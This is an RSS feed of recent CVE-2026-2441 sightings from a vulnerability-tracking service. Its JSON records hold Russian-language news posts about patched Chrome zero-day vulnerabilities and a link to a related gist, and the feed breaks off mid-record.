Most recent sightings.

Most recent sightings. https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Tue, 09 Jun 2026 08:43:22 +0000 44e3e113-0f25-4fe7-b575-955fade6972d https://vulnerability.circl.lu/sighting/44e3e113-0f25-4fe7-b575-955fade6972d/export {"uuid": "44e3e113-0f25-4fe7-b575-955fade6972d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "exploited", "source": "https://t.me/true_secator/7990", "content": "Google \u0430\u043d\u043e\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0434\u0432\u0443\u0445 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Chrome, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 0-day.\n\n\u041f\u0435\u0440\u0432\u0430\u044f (CVE-2026-3909) \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439\u00a0\u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430\u00a0\u0432 Skia, \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0434\u043b\u044f 2D-\u0433\u0440\u0430\u0444\u0438\u043a\u0438, \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0449\u0435\u0439 \u0437\u0430 \u0440\u0435\u043d\u0434\u0435\u0440\u0438\u043d\u0433 \u0432\u0435\u0431-\u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430 \u0438 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u0432\u044b\u0437\u043e\u0432\u0430 \u0441\u0431\u043e\u044f \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0434\u043b\u044f RCE.\n\n\u0412\u0442\u043e\u0440\u0430\u044f, CVE-2026-3910, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 JavaScript \u0438 WebAssembly V8.\n\nGoogle \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0438\u0445 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u0434\u043d\u0435\u0439. \u041d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Windows (146.0.7680.75), macOS (146.0.7680.76) \u0438 Linux (146.0.7680.75).\n\n\u0422\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0441\u043b\u0435\u0434\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u0432\u0443\u0445 0-day, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u044b\u0445 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432.\n\n\u0421 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430 \u044d\u0442\u043e \u0443\u0436\u0435 \u0432\u0442\u043e\u0440\u0430\u044f \u0438 \u0442\u0440\u0435\u0442\u044c\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 0-day \u0432 Chrome. \u041f\u0435\u0440\u0432\u0430\u044f, CVE-2026-2441 \u0432 CSSFontFeatureValuesMap (\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a \u0448\u0440\u0438\u0444\u0442\u043e\u0432 CSS \u0432 Chrome),\u00a0\u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f.\n\n\u0415\u0441\u043b\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u043d\u0443\u043b\u0435\u0439 \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f, \u0442\u043e \u0443 Google \u0431\u0443\u0434\u0443\u0442 \u0432\u0441\u0435 \u0448\u0430\u043d\u0441\u044b \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0433\u043e\u0434 \u0441 8 0-day, \u0430 \u043c\u043e\u0436\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043f\u0435\u0440\u0435\u0432\u0430\u043b\u0438\u0442\u044c \u0437\u0430 \u044d\u0442\u0443 \u043f\u043b\u0430\u043d\u043a\u0443. \u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2026-03-13T09:40:15.000000Z"} {"uuid": "44e3e113-0f25-4fe7-b575-955fade6972d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "exploited", "source": "https://t.me/true_secator/7990", "content": "Google \u0430\u043d\u043e\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0434\u0432\u0443\u0445 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Chrome, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 0-day.\n\n\u041f\u0435\u0440\u0432\u0430\u044f (CVE-2026-3909) \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439\u00a0\u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430\u00a0\u0432 Skia, \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0434\u043b\u044f 2D-\u0433\u0440\u0430\u0444\u0438\u043a\u0438, \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0449\u0435\u0439 \u0437\u0430 \u0440\u0435\u043d\u0434\u0435\u0440\u0438\u043d\u0433 \u0432\u0435\u0431-\u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430 \u0438 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u0432\u044b\u0437\u043e\u0432\u0430 \u0441\u0431\u043e\u044f \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0434\u043b\u044f RCE.\n\n\u0412\u0442\u043e\u0440\u0430\u044f, CVE-2026-3910, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 JavaScript \u0438 WebAssembly V8.\n\nGoogle \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0438\u0445 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u0434\u043d\u0435\u0439. \u041d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Windows (146.0.7680.75), macOS (146.0.7680.76) \u0438 Linux (146.0.7680.75).\n\n\u0422\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0441\u043b\u0435\u0434\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u0432\u0443\u0445 0-day, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u044b\u0445 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432.\n\n\u0421 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430 \u044d\u0442\u043e \u0443\u0436\u0435 \u0432\u0442\u043e\u0440\u0430\u044f \u0438 \u0442\u0440\u0435\u0442\u044c\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 0-day \u0432 Chrome. \u041f\u0435\u0440\u0432\u0430\u044f, CVE-2026-2441 \u0432 CSSFontFeatureValuesMap (\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a \u0448\u0440\u0438\u0444\u0442\u043e\u0432 CSS \u0432 Chrome),\u00a0\u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f.\n\n\u0415\u0441\u043b\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u043d\u0443\u043b\u0435\u0439 \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f, \u0442\u043e \u0443 Google \u0431\u0443\u0434\u0443\u0442 \u0432\u0441\u0435 \u0448\u0430\u043d\u0441\u044b \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0433\u043e\u0434 \u0441 8 0-day, \u0430 \u043c\u043e\u0436\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043f\u0435\u0440\u0435\u0432\u0430\u043b\u0438\u0442\u044c \u0437\u0430 \u044d\u0442\u0443 \u043f\u043b\u0430\u043d\u043a\u0443. \u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2026-03-13T09:40:15.000000Z"} https://vulnerability.circl.lu/sighting/44e3e113-0f25-4fe7-b575-955fade6972d/export Fri, 13 Mar 2026 09:40:15 +0000 74092d70-60d3-4b9b-87b0-4d19ff06f952 https://vulnerability.circl.lu/sighting/74092d70-60d3-4b9b-87b0-4d19ff06f952/export {"uuid": "74092d70-60d3-4b9b-87b0-4d19ff06f952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/LukasCollishawM/ef56756a964ded373553a6f71478bfed", "content": "", "creation_timestamp": "2026-03-29T17:52:55.000000Z"} {"uuid": "74092d70-60d3-4b9b-87b0-4d19ff06f952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/LukasCollishawM/ef56756a964ded373553a6f71478bfed", "content": "", "creation_timestamp": "2026-03-29T17:52:55.000000Z"} https://vulnerability.circl.lu/sighting/74092d70-60d3-4b9b-87b0-4d19ff06f952/export Sun, 29 Mar 2026 17:52:55 +0000 c75a44cb-1ced-4e4e-bd77-7eb7a32ae629 https://vulnerability.circl.lu/sighting/c75a44cb-1ced-4e4e-bd77-7eb7a32ae629/export {"uuid": "c75a44cb-1ced-4e4e-bd77-7eb7a32ae629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "exploited", "source": "https://t.me/true_secator/8054", "content": "Google \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0435\u0449\u0435 \u043e\u0434\u043d\u043e\u0439 \u0443\u0436\u0435 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0439 \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 0-day \u0432 Chrome, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n\nCVE-2026-5281, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0439 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 Chromium, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0442\u0438\u043f\u0430 \u00ab\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f\u00bb \u0432 Dawn, \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u043a\u0440\u043e\u0441\u0441\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0430 WebGPU, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c Chromium.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0441\u0431\u043e\u0438 \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435\u043c \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0435 \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435.\n\n\u041a\u0430\u043a \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442 \u0432 Google, \u0443 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0435\u0441\u0442\u044c \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 0-day \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u0438\u0445 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u044e\u0442\u0441\u044f.\n\n\u0414\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435, \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c.\n\nGoogle \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u0430\u043d\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u041f\u041a. \u041d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f Windows, macOS (146.0.7680.177/178) \u0438 Linux (146.0.7680.177).\n\n\u042d\u0442\u043e \u0443\u0436\u0435 \u0447\u0435\u0442\u0432\u0451\u0440\u0442\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f 0-day \u0432 Chrome, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u043f\u0435\u0440\u0432\u0430\u044f (CVE-2026-2441) \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u0430\u043d\u043d\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0442\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u0432 CSSFontFeatureValuesMap (\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a \u0448\u0440\u0438\u0444\u0442\u043e\u0432 CSS \u0432 Chrome), \u043a\u043e\u0442\u043e\u0440\u0443\u044e Google\u00a0\u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f\u00a0.\n\n\u0414\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 CVE \u0432 Chrome,\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0430\u043d\u0435\u0435 \u0432 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u00a0\u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430\u00a0\u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 2D-\u0433\u0440\u0430\u0444\u0438\u043a\u0438 Skia (CVE-2026-3909), \u0430 \u0432\u0442\u043e\u0440\u0430\u044f - \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 V8 JavaScript \u0438 WebAssembly (CVE-2026-3910).\n\n\u0412 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 Google \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438\u00a08 \u043d\u0443\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u0433\u0440\u043e\u0437 Google (TAG), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u0435\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.", "creation_timestamp": "2026-04-01T13:00:06.000000Z"} {"uuid": "c75a44cb-1ced-4e4e-bd77-7eb7a32ae629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "exploited", "source": "https://t.me/true_secator/8054", "content": "Google \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0435\u0449\u0435 \u043e\u0434\u043d\u043e\u0439 \u0443\u0436\u0435 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0439 \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430 